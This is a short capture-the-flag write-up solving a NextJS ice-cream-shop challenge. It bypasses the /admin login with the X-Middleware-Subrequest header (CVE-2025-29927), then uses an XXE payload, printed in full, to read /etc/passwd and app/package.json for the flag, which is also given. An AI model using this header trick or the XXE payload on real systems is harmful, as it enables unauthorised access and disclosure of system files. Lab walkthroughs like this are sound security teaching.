Solution

I was browsing web application and then I have checked all the endpoints in buildManifest file.

1

"/":["static/chunks/pages/index-962b18549cc4f828.js"],"/_error":["static/chunks/pages/_error-8353112a01355ec2.js"],"/admin":["static/chunks/pages/admin-6c2dae3cae78011c.js"],"/ice-cream-detail/[id]":["static/chunks/pages/ice-cream-detail/[id]-b32c99038b6ec0fd.js"],"/ice-cream-machines":["static/chunks/pages/ice-cream-machines-b24176f8afd36ccb.js"],"/login":["static/chunks/pages/login-bbb35bf68527fb05.js"],"/menu":["static/chunks/pages/menu-52c4263910fef849.js"],sortedPages:["/","/_app","/_error","/admin","/ice-cream-detail/[id]","/ice-cream-machines","/login","/menu"]

There is a /admin page. Upon visiting this page, I am redirected to /login page. But NextJS we have CVE-2025-29927 which will bypass the authentication. Let’s try to add X-Middleware-Subrequest: middleware ad middleware and then send the request.

We can see admin dashboard now! Upon hovering on all the links, we can see ice cream machine is the only link that is working. This is how ice cream machines tab will look like.

When we view settings and then check “parse settings”, we will see the website is using XML in request, so let’s try to do XML Injection to view /etc/passwd. The payload will be

<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>\n<machine>\n  <id>&test;</id>\n  <name>Ice Cream Machine</name>\n  <temperature>-18</temperature>\n  <mixLevel>75</mixLevel>\n  <lastMaintenance>2025-03-15</lastMaintenance>\n  <cleaningSchedule>Daily</cleaningSchedule>\n</machine>

In modern NextJS application, all the files will be in app/ folder, so we will look at package.json file://app/package.json and we will get our flag!

Flag

INTIGRITI{XXE_1n_Ic3Cr34m_M4ch1n3s}